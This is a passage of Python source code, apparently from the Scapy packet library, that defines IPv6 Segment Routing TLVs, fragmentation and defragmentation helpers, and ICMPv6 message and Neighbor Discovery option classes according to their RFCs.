IPv6ExtHdrSegmentRoutingTLVPadN(IPv6ExtHdrSegmentRoutingTLV): 966 name = "IPv6 Option Header Segment Routing - PadN TLV" 967 # RFC8754 sect 2.1.1.2 968 fields_desc = [ByteEnumField("type", 4, _segment_routing_header_tlvs), 969 FieldLenField("len", None, length_of="padding", fmt="B"), 970 StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len)] # noqa: E501 971 972 973class IPv6ExtHdrSegmentRoutingTLVHMAC(IPv6ExtHdrSegmentRoutingTLV): 974 name = "IPv6 Option Header Segment Routing - HMAC TLV" 975 # RFC8754 sect 2.1.2 976 fields_desc = [ByteEnumField("type", 5, _segment_routing_header_tlvs), 977 FieldLenField("len", None, length_of="hmac", 978 adjust=lambda _, x: x + 48), 979 BitField("D", 0, 1), 980 BitField("reserved", 0, 15), 981 IntField("hmackeyid", 0), 982 StrLenField("hmac", "", 983 length_from=lambda pkt: pkt.len - 48)] 984 985 986class IPv6ExtHdrSegmentRouting(_IPv6ExtHdr): 987 name = "IPv6 Option Header Segment Routing" 988 # RFC8754 sect 2. + flag bits from draft 06 989 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 990 ByteField("len", None), 991 ByteField("type", 4), 992 ByteField("segleft", None), 993 ByteField("lastentry", None), 994 BitField("unused1", 0, 1), 995 BitField("protected", 0, 1), 996 BitField("oam", 0, 1), 997 BitField("alert", 0, 1), 998 BitField("hmac", 0, 1), 999 BitField("unused2", 0, 3), 1000 ShortField("tag", 0), 1001 IP6ListField("addresses", ["::1"], 1002 count_from=lambda pkt: (pkt.lastentry + 1)), 1003 PacketListField("tlv_objects", [], 1004 IPv6ExtHdrSegmentRoutingTLV, 1005 length_from=lambda pkt: 8 * pkt.len - 16 * ( 1006 pkt.lastentry + 1 1007 ))] 1008 1009 overload_fields = {IPv6: {"nh": 43}} 1010 1011 def post_build(self, pkt, pay): 1012 1013 if self.len is None: 1014 1015 # The extension must be align on 8 bytes 1016 tmp_mod = (-len(pkt) + 8) % 8 1017 if tmp_mod == 1: 1018 tlv = IPv6ExtHdrSegmentRoutingTLVPad1() 1019 pkt += raw(tlv) 1020 elif tmp_mod >= 2: 1021 # Add the padding extension 1022 tmp_pad = b"\x00" * (tmp_mod - 2) 1023 tlv = IPv6ExtHdrSegmentRoutingTLVPadN(padding=tmp_pad) 1024 pkt += raw(tlv) 1025 1026 tmp_len = (len(pkt) - 8) // 8 1027 pkt = pkt[:1] + struct.pack("B", tmp_len) + pkt[2:] 1028 1029 if self.segleft is None: 1030 tmp_len = len(self.addresses) 1031 if tmp_len: 1032 tmp_len -= 1 1033 pkt = pkt[:3] + struct.pack("B", tmp_len) + pkt[4:] 1034 1035 if self.lastentry is None: 1036 lastentry = len(self.addresses) 1037 if lastentry == 0: 1038 warning( 1039 "IPv6ExtHdrSegmentRouting(): the addresses list is empty!" 1040 ) 1041 else: 1042 lastentry -= 1 1043 pkt = pkt[:4] + struct.pack("B", lastentry) + pkt[5:] 1044 1045 return _IPv6ExtHdr.post_build(self, pkt, pay) 1046 1047 1048# Fragmentation Header # 1049 1050class IPv6ExtHdrFragment(_IPv6ExtHdr): 1051 name = "IPv6 Extension Header - Fragmentation header" 1052 fields_desc = [ByteEnumField("nh", 59, ipv6nh), 1053 BitField("res1", 0, 8), 1054 BitField("offset", 0, 13), 1055 BitField("res2", 0, 2), 1056 BitField("m", 0, 1), 1057 IntField("id", None)] 1058 overload_fields = {IPv6: {"nh": 44}} 1059 1060 def guess_payload_class(self, p): 1061 if self.offset > 0: 1062 return Raw 1063 else: 1064 return super(IPv6ExtHdrFragment, self).guess_payload_class(p) 1065 1066 1067def defragment6(packets): 1068 """ 1069 Performs defragmentation of a list of IPv6 packets. Packets are reordered. 1070 Crap is dropped. What lacks is completed by 'X' characters. 1071 """ 1072 1073 # Remove non fragments 1074 lst = [x for x in packets if IPv6ExtHdrFragment in x] 1075 if not lst: 1076 return [] 1077 1078 id = lst[0][IPv6ExtHdrFragment].id 1079 1080 llen = len(lst) 1081 lst = [x for x in lst if x[IPv6ExtHdrFragment].id == id] 1082 if len(lst) != llen: 1083 warning("defragment6: some fragmented packets have been removed from list") # noqa: E501 1084 1085 # reorder fragments 1086 res = [] 1087 while lst: 1088 min_pos = 0 1089 min_offset = lst[0][IPv6ExtHdrFragment].offset 1090 for p in lst: 1091 cur_offset = p[IPv6ExtHdrFragment].offset 1092 if cur_offset < min_offset: 1093 min_pos = 0 1094 min_offset = cur_offset 1095 res.append(lst[min_pos]) 1096 del(lst[min_pos]) 1097 1098 # regenerate the fragmentable part 1099 fragmentable = b"" 1100 for p in res: 1101 q = p[IPv6ExtHdrFragment] 1102 offset = 8 * q.offset 1103 if offset != len(fragmentable): 1104 warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset)) # noqa: E501 1105 fragmentable += b"X" * (offset - len(fragmentable)) 1106 fragmentable += raw(q.payload) 1107 1108 # Regenerate the unfragmentable part. 1109 q = res[0].copy() 1110 nh = q[IPv6ExtHdrFragment].nh 1111 q[IPv6ExtHdrFragment].underlayer.nh = nh 1112 q[IPv6ExtHdrFragment].underlayer.plen = len(fragmentable) 1113 del q[IPv6ExtHdrFragment].underlayer.payload 1114 q /= conf.raw_layer(load=fragmentable) 1115 del(q.plen) 1116 1117 if q[IPv6].underlayer: 1118 q[IPv6] = IPv6(raw(q[IPv6])) 1119 else: 1120 q = IPv6(raw(q)) 1121 return q 1122 1123 1124def fragment6(pkt, fragSize): 1125 """ 1126 Performs fragmentation of an IPv6 packet. 'fragSize' argument is the 1127 expected maximum size of fragment data (MTU). The list of packets is 1128 returned. 1129 1130 If packet does not contain an IPv6ExtHdrFragment class, it is added to 1131 first IPv6 layer found. If no IPv6 layer exists packet is returned in 1132 result list unmodified. 1133 """ 1134 1135 pkt = pkt.copy() 1136 1137 if IPv6ExtHdrFragment not in pkt: 1138 if IPv6 not in pkt: 1139 return [pkt] 1140 1141 layer3 = pkt[IPv6] 1142 data = layer3.payload 1143 frag = IPv6ExtHdrFragment(nh=layer3.nh) 1144 1145 layer3.remove_payload() 1146 del(layer3.nh) 1147 del(layer3.plen) 1148 1149 frag.add_payload(data) 1150 layer3.add_payload(frag) 1151 1152 # If the payload is bigger than 65535, a Jumbo payload must be used, as 1153 # an IPv6 packet can't be bigger than 65535 bytes. 1154 if len(raw(pkt[IPv6ExtHdrFragment])) > 65535: 1155 warning("An IPv6 packet can'be bigger than 65535, please use a Jumbo payload.") # noqa: E501 1156 return [] 1157 1158 s = raw(pkt) # for instantiation to get upper layer checksum right 1159 1160 if len(s) <= fragSize: 1161 return [pkt] 1162 1163 # Fragmentable part : fake IPv6 for Fragmentable part length computation 1164 fragPart = pkt[IPv6ExtHdrFragment].payload 1165 tmp = raw(IPv6(src="::1", dst="::1") / fragPart) 1166 fragPartLen = len(tmp) - 40 # basic IPv6 header length 1167 fragPartStr = s[-fragPartLen:] 1168 1169 # Grab Next Header for use in Fragment Header 1170 nh = pkt[IPv6ExtHdrFragment].nh 1171 1172 # Keep fragment header 1173 fragHeader = pkt[IPv6ExtHdrFragment] 1174 del fragHeader.payload # detach payload 1175 1176 # Unfragmentable Part 1177 unfragPartLen = len(s) - fragPartLen - 8 1178 unfragPart = pkt 1179 del pkt[IPv6ExtHdrFragment].underlayer.payload # detach payload 1180 1181 # Cut the fragmentable part to fit fragSize. Inner fragments have 1182 # a length that is an integer multiple of 8 octets. last Frag MTU 1183 # can be anything below MTU 1184 lastFragSize = fragSize - unfragPartLen - 8 1185 innerFragSize = lastFragSize - (lastFragSize % 8) 1186 1187 if lastFragSize <= 0 or innerFragSize == 0: 1188 warning("Provided fragment size value is too low. " + 1189 "Should be more than %d" % (unfragPartLen + 8)) 1190 return [unfragPart / fragHeader / fragPart] 1191 1192 remain = fragPartStr 1193 res = [] 1194 fragOffset = 0 # offset, incremeted during creation 1195 fragId = random.randint(0, 0xffffffff) # random id ... 1196 if fragHeader.id is not None: # ... except id provided by user 1197 fragId = fragHeader.id 1198 fragHeader.m = 1 1199 fragHeader.id = fragId 1200 fragHeader.nh = nh 1201 1202 # Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ... 1203 while True: 1204 if (len(remain) > lastFragSize): 1205 tmp = remain[:innerFragSize] 1206 remain = remain[innerFragSize:] 1207 fragHeader.offset = fragOffset # update offset 1208 fragOffset += (innerFragSize // 8) # compute new one 1209 if IPv6 in unfragPart: 1210 unfragPart[IPv6].plen = None 1211 tempo = unfragPart / fragHeader / conf.raw_layer(load=tmp) 1212 res.append(tempo) 1213 else: 1214 fragHeader.offset = fragOffset # update offSet 1215 fragHeader.m = 0 1216 if IPv6 in unfragPart: 1217 unfragPart[IPv6].plen = None 1218 tempo = unfragPart / fragHeader / conf.raw_layer(load=remain) 1219 res.append(tempo) 1220 break 1221 return res 1222 1223 1224############################################################################# 1225############################################################################# 1226# ICMPv6* Classes # 1227############################################################################# 1228############################################################################# 1229 1230 1231icmp6typescls = {1: "ICMPv6DestUnreach", 1232 2: "ICMPv6PacketTooBig", 1233 3: "ICMPv6TimeExceeded", 1234 4: "ICMPv6ParamProblem", 1235 128: "ICMPv6EchoRequest", 1236 129: "ICMPv6EchoReply", 1237 130: "ICMPv6MLQuery", # MLDv1 or MLDv2 1238 131: "ICMPv6MLReport", 1239 132: "ICMPv6MLDone", 1240 133: "ICMPv6ND_RS", 1241 134: "ICMPv6ND_RA", 1242 135: "ICMPv6ND_NS", 1243 136: "ICMPv6ND_NA", 1244 137: "ICMPv6ND_Redirect", 1245 # 138: Do Me - RFC 2894 - Seems painful 1246 139: "ICMPv6NIQuery", 1247 140: "ICMPv6NIReply", 1248 141: "ICMPv6ND_INDSol", 1249 142: "ICMPv6ND_INDAdv", 1250 143: "ICMPv6MLReport2", 1251 144: "ICMPv6HAADRequest", 1252 145: "ICMPv6HAADReply", 1253 146: "ICMPv6MPSol", 1254 147: "ICMPv6MPAdv", 1255 # 148: Do Me - SEND related - RFC 3971 1256 # 149: Do Me - SEND related - RFC 3971 1257 151: "ICMPv6MRD_Advertisement", 1258 152: "ICMPv6MRD_Solicitation", 1259 153: "ICMPv6MRD_Termination", 1260 # 154: Do Me - FMIPv6 Messages - RFC 5568 1261 155: "ICMPv6RPL", # RFC 6550 1262 } 1263 1264icmp6typesminhdrlen = {1: 8, 1265 2: 8, 1266 3: 8, 1267 4: 8, 1268 128: 8, 1269 129: 8, 1270 130: 24, 1271 131: 24, 1272 132: 24, 1273 133: 8, 1274 134: 16, 1275 135: 24, 1276 136: 24, 1277 137: 40, 1278 # 139: 1279 # 140 1280 141: 8, 1281 142: 8, 1282 143: 8, 1283 144: 8, 1284 145: 8, 1285 146: 8, 1286 147: 8, 1287 151: 8, 1288 152: 4, 1289 153: 4, 1290 155: 4 1291 } 1292 1293icmp6types = {1: "Destination unreachable", 1294 2: "Packet too big", 1295 3: "Time exceeded", 1296 4: "Parameter problem", 1297 100: "Private Experimentation", 1298 101: "Private Experimentation", 1299 128: "Echo Request", 1300 129: "Echo Reply", 1301 130: "MLD Query", 1302 131: "MLD Report", 1303 132: "MLD Done", 1304 133: "Router Solicitation", 1305 134: "Router Advertisement", 1306 135: "Neighbor Solicitation", 1307 136: "Neighbor Advertisement", 1308 137: "Redirect Message", 1309 138: "Router Renumbering", 1310 139: "ICMP Node Information Query", 1311 140: "ICMP Node Information Response", 1312 141: "Inverse Neighbor Discovery Solicitation Message", 1313 142: "Inverse Neighbor Discovery Advertisement Message", 1314 143: "MLD Report Version 2", 1315 144: "Home Agent Address Discovery Request Message", 1316 145: "Home Agent Address Discovery Reply Message", 1317 146: "Mobile Prefix Solicitation", 1318 147: "Mobile Prefix Advertisement", 1319 148: "Certification Path Solicitation", 1320 149: "Certification Path Advertisement", 1321 151: "Multicast Router Advertisement", 1322 152: "Multicast Router Solicitation", 1323 153: "Multicast Router Termination", 1324 155: "RPL Control Message", 1325 200: "Private Experimentation", 1326 201: "Private Experimentation"} 1327 1328 1329class _ICMPv6(Packet): 1330 name = "ICMPv6 dummy class" 1331 overload_fields = {IPv6: {"nh": 58}} 1332 1333 def post_build(self, p, pay): 1334 p += pay 1335 if self.cksum is None: 1336 chksum = in6_chksum(58, self.underlayer, p) 1337 p = p[:2] + struct.pack("!H", chksum) + p[4:] 1338 return p 1339 1340 def hashret(self): 1341 return self.payload.hashret() 1342 1343 def answers(self, other): 1344 # isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ... 1345 if (isinstance(self.underlayer, IPerror6) or 1346 isinstance(self.underlayer, _IPv6ExtHdr) and 1347 isinstance(other, _ICMPv6)): 1348 if not ((self.type == other.type) and 1349 (self.code == other.code)): 1350 return 0 1351 return 1 1352 return 0 1353 1354 1355class _ICMPv6Error(_ICMPv6): 1356 name = "ICMPv6 errors dummy class" 1357 1358 def guess_payload_class(self, p): 1359 return IPerror6 1360 1361 1362class ICMPv6Unknown(_ICMPv6): 1363 name = "Scapy6 ICMPv6 fallback class" 1364 fields_desc = [ByteEnumField("type", 1, icmp6types), 1365 ByteField("code", 0), 1366 XShortField("cksum", None), 1367 StrField("msgbody", "")] 1368 1369 1370# RFC 2460 # 1371 1372class ICMPv6DestUnreach(_ICMPv6Error): 1373 name = "ICMPv6 Destination Unreachable" 1374 fields_desc = [ByteEnumField("type", 1, icmp6types), 1375 ByteEnumField("code", 0, {0: "No route to destination", 1376 1: "Communication with destination administratively prohibited", # noqa: E501 1377 2: "Beyond scope of source address", # noqa: E501 1378 3: "Address unreachable", 1379 4: "Port unreachable"}), 1380 XShortField("cksum", None), 1381 ByteField("length", 0), 1382 X3BytesField("unused", 0)] 1383 1384 1385class ICMPv6PacketTooBig(_ICMPv6Error): 1386 name = "ICMPv6 Packet Too Big" 1387 fields_desc = [ByteEnumField("type", 2, icmp6types), 1388 ByteField("code", 0), 1389 XShortField("cksum", None), 1390 IntField("mtu", 1280)] 1391 1392 1393class ICMPv6TimeExceeded(_ICMPv6Error): 1394 name = "ICMPv6 Time Exceeded" 1395 fields_desc = [ByteEnumField("type", 3, icmp6types), 1396 ByteEnumField("code", 0, {0: "hop limit exceeded in transit", # noqa: E501 1397 1: "fragment reassembly time exceeded"}), # noqa: E501 1398 XShortField("cksum", None), 1399 ByteField("length", 0), 1400 X3BytesField("unused", 0)] 1401 1402# The default pointer value is set to the next header field of 1403# the encapsulated IPv6 packet 1404 1405 1406class ICMPv6ParamProblem(_ICMPv6Error): 1407 name = "ICMPv6 Parameter Problem" 1408 fields_desc = [ByteEnumField("type", 4, icmp6types), 1409 ByteEnumField( 1410 "code", 0, 1411 {0: "erroneous header field encountered", 1412 1: "unrecognized Next Header type encountered", 1413 2: "unrecognized IPv6 option encountered", 1414 3: "first fragment has incomplete header chain"}), 1415 XShortField("cksum", None), 1416 IntField("ptr", 6)] 1417 1418 1419class ICMPv6EchoRequest(_ICMPv6): 1420 name = "ICMPv6 Echo Request" 1421 fields_desc = [ByteEnumField("type", 128, icmp6types), 1422 ByteField("code", 0), 1423 XShortField("cksum", None), 1424 XShortField("id", 0), 1425 XShortField("seq", 0), 1426 StrField("data", "")] 1427 1428 def mysummary(self): 1429 return self.sprintf("%name% (id: %id% seq: %seq%)") 1430 1431 def hashret(self): 1432 return struct.pack("HH", self.id, self.seq) + self.payload.hashret() 1433 1434 1435class ICMPv6EchoReply(ICMPv6EchoRequest): 1436 name = "ICMPv6 Echo Reply" 1437 type = 129 1438 1439 def answers(self, other): 1440 # We could match data content between request and reply. 1441 return (isinstance(other, ICMPv6EchoRequest) and 1442 self.id == other.id and self.seq == other.seq and 1443 self.data == other.data) 1444 1445 1446# ICMPv6 Multicast Listener Discovery (RFC2710) # 1447 1448# tous les messages MLD sont emis avec une adresse source lien-locale 1449# -> Y veiller dans le post_build si aucune n'est specifiee 1450# La valeur de Hop-Limit doit etre de 1 1451# "and an IPv6 Router Alert option in a Hop-by-Hop Options 1452# header. (The router alert option is necessary to cause routers to 1453# examine MLD messages sent to multicast addresses in which the router 1454# itself has no interest" 1455class _ICMPv6ML(_ICMPv6): 1456 fields_desc = [ByteEnumField("type", 130, icmp6types), 1457 ByteField("code", 0), 1458 XShortField("cksum", None), 1459 ShortField("mrd", 0), 1460 ShortField("reserved", 0), 1461 IP6Field("mladdr", "::")] 1462 1463# general queries are sent to the link-scope all-nodes multicast 1464# address ff02::1, with a multicast address field of 0 and a MRD of 1465# [Query Response Interval] 1466# Default value for mladdr is set to 0 for a General Query, and 1467# overloaded by the user for a Multicast Address specific query 1468# TODO : See what we can do to automatically include a Router Alert 1469# Option in a Destination Option Header. 1470 1471 1472class ICMPv6MLQuery(_ICMPv6ML): # RFC 2710 1473 name = "MLD - Multicast Listener Query" 1474 type = 130 1475 mrd = 10000 # 10s for mrd 1476 mladdr = "::" 1477 overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}} 1478 1479 1480# TODO : See what we can do to automatically include a Router Alert 1481# Option in a Destination Option Header. 1482class ICMPv6MLReport(_ICMPv6ML): # RFC 2710 1483 name = "MLD - Multicast Listener Report" 1484 type = 131 1485 overload_fields = {IPv6: {"hlim": 1, "nh": 58}} 1486 1487 def answers(self, query): 1488 """Check the query type""" 1489 return ICMPv6MLQuery in query 1490 1491# When a node ceases to listen to a multicast address on an interface, 1492# it SHOULD send a single Done message to the link-scope all-routers 1493# multicast address (FF02::2), carrying in its multicast address field 1494# the address to which it is ceasing to listen 1495# TODO : See what we can do to automatically include a Router Alert 1496# Option in a Destination Option Header. 1497 1498 1499class ICMPv6MLDone(_ICMPv6ML): # RFC 2710 1500 name = "MLD - Multicast Listener Done" 1501 type = 132 1502 overload_fields = {IPv6: {"dst": "ff02::2", "hlim": 1, "nh": 58}} 1503 1504 1505# Multicast Listener Discovery Version 2 (MLDv2) (RFC3810) # 1506 1507class ICMPv6MLQuery2(_ICMPv6): # RFC 3810 1508 name = "MLDv2 - Multicast Listener Query" 1509 fields_desc = [ByteEnumField("type", 130, icmp6types), 1510 ByteField("code", 0), 1511 XShortField("cksum", None), 1512 ShortField("mrd", 10000), 1513 ShortField("reserved", 0), 1514 IP6Field("mladdr", "::"), 1515 BitField("Resv", 0, 4), 1516 BitField("S", 0, 1), 1517 BitField("QRV", 0, 3), 1518 ByteField("QQIC", 0), 1519 ShortField("sources_number", None), 1520 IP6ListField("sources", [], 1521 count_from=lambda pkt: pkt.sources_number)] 1522 1523 # RFC8810 - 4. Message Formats 1524 overload_fields = {IPv6: {"dst": "ff02::1", "hlim": 1, "nh": 58}} 1525 1526 def post_build(self, packet, payload): 1527 """Compute the 'sources_number' field when needed""" 1528 if self.sources_number is None: 1529 srcnum = struct.pack("!H", len(self.sources)) 1530 packet = packet[:26] + srcnum + packet[28:] 1531 return _ICMPv6.post_build(self, packet, payload) 1532 1533 1534class ICMPv6MLDMultAddrRec(Packet): 1535 name = "ICMPv6 MLDv2 - Multicast Address Record" 1536 fields_desc = [ByteField("rtype", 4), 1537 FieldLenField("auxdata_len", None, 1538 length_of="auxdata", 1539 fmt="B"), 1540 FieldLenField("sources_number", None, 1541 length_of="sources", 1542 adjust=lambda p, num: num // 16), 1543 IP6Field("dst", "::"), 1544 IP6ListField("sources", [], 1545 length_from=lambda p: 16 * p.sources_number), 1546 StrLenField("auxdata", "", 1547 length_from=lambda p: p.auxdata_len)] 1548 1549 def default_payload_class(self, packet): 1550 """Multicast Address Record followed by another one""" 1551 return self.__class__ 1552 1553 1554class ICMPv6MLReport2(_ICMPv6): # RFC 3810 1555 name = "MLDv2 - Multicast Listener Report" 1556 fields_desc = [ByteEnumField("type", 143, icmp6types), 1557 ByteField("res", 0), 1558 XShortField("cksum", None), 1559 ShortField("reserved", 0), 1560 ShortField("records_number", None), 1561 PacketListField("records", [], 1562 ICMPv6MLDMultAddrRec, 1563 count_from=lambda p: p.records_number)] 1564 1565 # RFC8810 - 4. Message Formats 1566 overload_fields = {IPv6: {"dst": "ff02::16", "hlim": 1, "nh": 58}} 1567 1568 def post_build(self, packet, payload): 1569 """Compute the 'records_number' field when needed""" 1570 if self.records_number is None: 1571 recnum = struct.pack("!H", len(self.records)) 1572 packet = packet[:6] + recnum + packet[8:] 1573 return _ICMPv6.post_build(self, packet, payload) 1574 1575 def answers(self, query): 1576 """Check the query type""" 1577 return isinstance(query, ICMPv6MLQuery2) 1578 1579 1580# ICMPv6 MRD - Multicast Router Discovery (RFC 4286) # 1581 1582# TODO: 1583# - 04/09/06 troglocan : find a way to automatically add a router alert 1584# option for all MRD packets. This could be done in a specific 1585# way when IPv6 is the under layer with some specific keyword 1586# like 'exthdr'. This would allow to keep compatibility with 1587# providing IPv6 fields to be overloaded in fields_desc. 1588# 1589# At the moment, if user inserts an IPv6 Router alert option 1590# none of the IPv6 default values of IPv6 layer will be set. 1591 1592class ICMPv6MRD_Advertisement(_ICMPv6): 1593 name = "ICMPv6 Multicast Router Discovery Advertisement" 1594 fields_desc = [ByteEnumField("type", 151, icmp6types), 1595 ByteField("advinter", 20), 1596 XShortField("cksum", None), 1597 ShortField("queryint", 0), 1598 ShortField("robustness", 0)] 1599 overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}} 1600 # IPv6 Router Alert requires manual inclusion 1601 1602 def extract_padding(self, s): 1603 return s[:8], s[8:] 1604 1605 1606class ICMPv6MRD_Solicitation(_ICMPv6): 1607 name = "ICMPv6 Multicast Router Discovery Solicitation" 1608 fields_desc = [ByteEnumField("type", 152, icmp6types), 1609 ByteField("res", 0), 1610 XShortField("cksum", None)] 1611 overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::2"}} 1612 # IPv6 Router Alert requires manual inclusion 1613 1614 def extract_padding(self, s): 1615 return s[:4], s[4:] 1616 1617 1618class ICMPv6MRD_Termination(_ICMPv6): 1619 name = "ICMPv6 Multicast Router Discovery Termination" 1620 fields_desc = [ByteEnumField("type", 153, icmp6types), 1621 ByteField("res", 0), 1622 XShortField("cksum", None)] 1623 overload_fields = {IPv6: {"nh": 58, "hlim": 1, "dst": "ff02::6A"}} 1624 # IPv6 Router Alert requires manual inclusion 1625 1626 def extract_padding(self, s): 1627 return s[:4], s[4:] 1628 1629 1630# ICMPv6 Neighbor Discovery (RFC 2461) # 1631 1632icmp6ndopts = {1: "Source Link-Layer Address", 1633 2: "Target Link-Layer Address", 1634 3: "Prefix Information", 1635 4: "Redirected Header", 1636 5: "MTU", 1637 6: "NBMA Shortcut Limit Option", # RFC2491 1638 7: "Advertisement Interval Option", 1639 8: "Home Agent Information Option", 1640 9: "Source Address List", 1641 10: "Target Address List", 1642 11: "CGA Option", # RFC 3971 1643 12: "RSA Signature Option", # RFC 3971 1644 13: "Timestamp Option", # RFC 3971 1645 14: "Nonce option", # RFC 3971 1646 15: "Trust Anchor Option", # RFC 3971 1647 16: "Certificate Option", # RFC 3971 1648 17: "IP Address Option", # RFC 4068 1649 18: "New Router Prefix Information Option", # RFC 4068 1650 19: "Link-layer Address Option", # RFC 4068 1651 20: "Neighbor Advertisement Acknowledgement Option", 1652 21: "CARD Request Option", # RFC 4065/4066/4067 1653 22: "CARD Reply Option", # RFC 4065/4066/4067 1654 23: "MAP Option", # RFC 4140 1655 24: "Route Information Option", # RFC 4191 1656 25: "Recursive DNS Server Option", 1657 26: "IPv6 Router Advertisement Flags Option" 1658 } 1659 1660icmp6ndoptscls = {1: "ICMPv6NDOptSrcLLAddr", 1661 2: "ICMPv6NDOptDstLLAddr", 1662 3: "ICMPv6NDOptPrefixInfo", 1663 4: "ICMPv6NDOptRedirectedHdr", 1664 5: "ICMPv6NDOptMTU", 1665 6: "ICMPv6NDOptShortcutLimit", 1666 7: "ICMPv6NDOptAdvInterval", 1667 8: "ICMPv6NDOptHAInfo", 1668 9: "ICMPv6NDOptSrcAddrList", 1669 10: "ICMPv6NDOptTgtAddrList", 1670 # 11: ICMPv6NDOptCGA, RFC3971 - contrib/send.py 1671 # 12: ICMPv6NDOptRsaSig, RFC3971 - contrib/send.py 1672 # 13: ICMPv6NDOptTmstp, RFC3971 - contrib/send.py 1673 # 14: ICMPv6NDOptNonce, RFC3971 - contrib/send.py 1674 # 15: Do Me, 1675 # 16: Do Me, 1676 17: "ICMPv6NDOptIPAddr", 1677 18: "ICMPv6NDOptNewRtrPrefix", 1678 19: "ICMPv6NDOptLLA", 1679 # 18: Do Me, 1680 # 19: Do Me, 1681 # 20: Do Me, 1682 # 21: Do Me, 1683 # 22: Do Me, 1684 23: "ICMPv6NDOptMAP", 1685 24: "ICMPv6NDOptRouteInfo", 1686 25: "ICMPv6NDOptRDNSS", 1687 26: "ICMPv6NDOptEFA", 1688 31: "ICMPv6NDOptDNSSL" 1689 } 1690 1691icmp6ndraprefs = {0: "Medium (default)", 1692 1: "High", 1693 2: "Reserved", 1694 3: "Low"} # RFC 4191 1695 1696 1697class _ICMPv6NDGuessPayload: 1698 name = "Dummy ND class that implements guess_payload_class()" 1699 1700 def guess_payload_class(self, p): 1701 if len(p) > 1: 1702 return icmp6ndoptscls.get(orb(p[0]), Raw) # s/Raw/ICMPv6NDOptUnknown/g ? # noqa: E501 1703 1704 1705# Beginning of ICMPv6 Neighbor Discovery Options. 1706 1707class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet): 1708 name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented" 1709 fields_desc = [ByteField("type", None), 1710 FieldLenField("len", None, length_of="data", fmt="B", 1711 adjust=lambda pkt, x: x + 2), 1712 StrLenField("data", "", 1713 length_from=lambda pkt: pkt.len - 2)] 1714 1715# NOTE: len includes type and len field. Expressed in unit of 8 bytes 1716# TODO: Revoir le coup du ETHER_ANY 1717 1718 1719class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet): 1720 name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address" 1721 fields_desc = [ByteField("type", 1), 1722 ByteField("len", 1), 1723 MACField("lladdr", ETHER_ANY)] 1724 1725 def mysummary(self): 1726 return self.sprintf("%name% %lladdr%") 1727 1728 1729class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr): 1730 name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address" 1731 type = 2 1732 1733 1734class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet): 1735 name = "ICMPv6 Neighbor Discovery Option - Prefix Information" 1736 fields_desc = [ByteField("type", 3), 1737 ByteField("len", 4), 1738 ByteField("prefixlen", 64), 1739 BitField("L", 1, 1), 1740 BitField("A", 1, 1), 1741 BitField("R", 0, 1), 1742 BitField("res1", 0, 5), 1743 XIntField("validlifetime", 0xffffffff), 1744 XIntField("preferredlifetime", 0xffffffff), 1745 XIntField("res2", 0x00000000), 1746 IP6Field("prefix", "::")] 1747 1748 def mysummary(self): 1749 return self.sprintf("%name% %prefix%/%prefixlen% " 1750 "On-link %L% Autonomous Address %A% " 1751 "Router Address %R%") 1752 1753# TODO: We should also limit the size of included packet to something 1754# like (initiallen - 40 - 2) 1755 1756 1757class TruncPktLenField(PacketLenField): 1758 __slots__ = ["cur_shift"] 1759 1760 def __init__(self, name, default, cls, cur_shift, length_from=None, shift=0): # noqa: E501 1761 PacketLenField.__init__(self, name, default, cls, length_from=length_from) # noqa: E501 1762 self.cur_shift = cur_shift 1763 1764 def getfield(self, pkt, s): 1765 tmp_len = self.length_from(pkt) 1766 i = self.m2i(pkt, s[:tmp_len]) 1767 return s[tmp_len:], i 1768 1769 def m2i(self, pkt, m): 1770 s = None 1771 try: # It can happen we have sth shorter than 40 bytes 1772 s = self.cls(m) 1773 except Exception: 1774 return conf.raw_layer(m) 1775 return s 1776 1777 def i2m(self, pkt, x): 1778 s = raw(x) 1779 tmp_len = len(s) 1780 r = (tmp_len + self.cur_shift) % 8 1781 tmp_len = tmp_len - r 1782 return s[:tmp_len] 1783 1784 def i2len(self, pkt, i): 1785 return len(self.i2m(pkt, i)) 1786 1787 1788# Faire un post_build pour le recalcul de la taille (en multiple de 8 octets) 1789class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet): 1790 name = "ICMPv6 Neighbor Discovery Option - Redirected Header" 1791 fields_desc = [ByteField("type", 4), 1792 FieldLenField("len", None, length_of="pkt", fmt="B", 1793 adjust=lambda pkt, x:(x + 8) // 8), 1794 StrFixedLenField("res", b"\x00" * 6, 6), 1795 TruncPktLenField("pkt", b"", IPv6, 8, 1796 length_from=lambda pkt: 8 * pkt.len - 8)] 1797 1798# See which value should be used for default MTU instead of 1280 1799 1800 1801class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet): 1802 name = "ICMPv6 Neighbor Discovery Option - MTU" 1803 fields_desc = [ByteField("type", 5), 1804 ByteField("len", 1), 1805 XShortField("res", 0), 1806 IntField("mtu", 1280)] 1807 1808 def mysummary(self): 1809 return self.sprintf("%name% %mtu%") 1810 1811 1812class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet): # RFC 2491 1813 name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit" 1814 fields_desc = [ByteField("type", 6), 1815 ByteField("len", 1), 1816 ByteField("shortcutlim", 40), # XXX 1817 ByteField("res1", 0), 1818 IntField("res2", 0)] 1819 1820 1821class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet): 1822 name = "ICMPv6 Neighbor Discovery - Interval Advertisement" 1823 fields_desc = [ByteField("type", 7), 1824 ByteField("len", 1), 1825 ShortField("res", 0), 1826 IntField("advint", 0)] 1827 1828 def mysummary(self): 1829 return self.sprintf("%name% %advint% milliseconds") 1830 1831 1832class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet): 1833 name = "ICMPv6 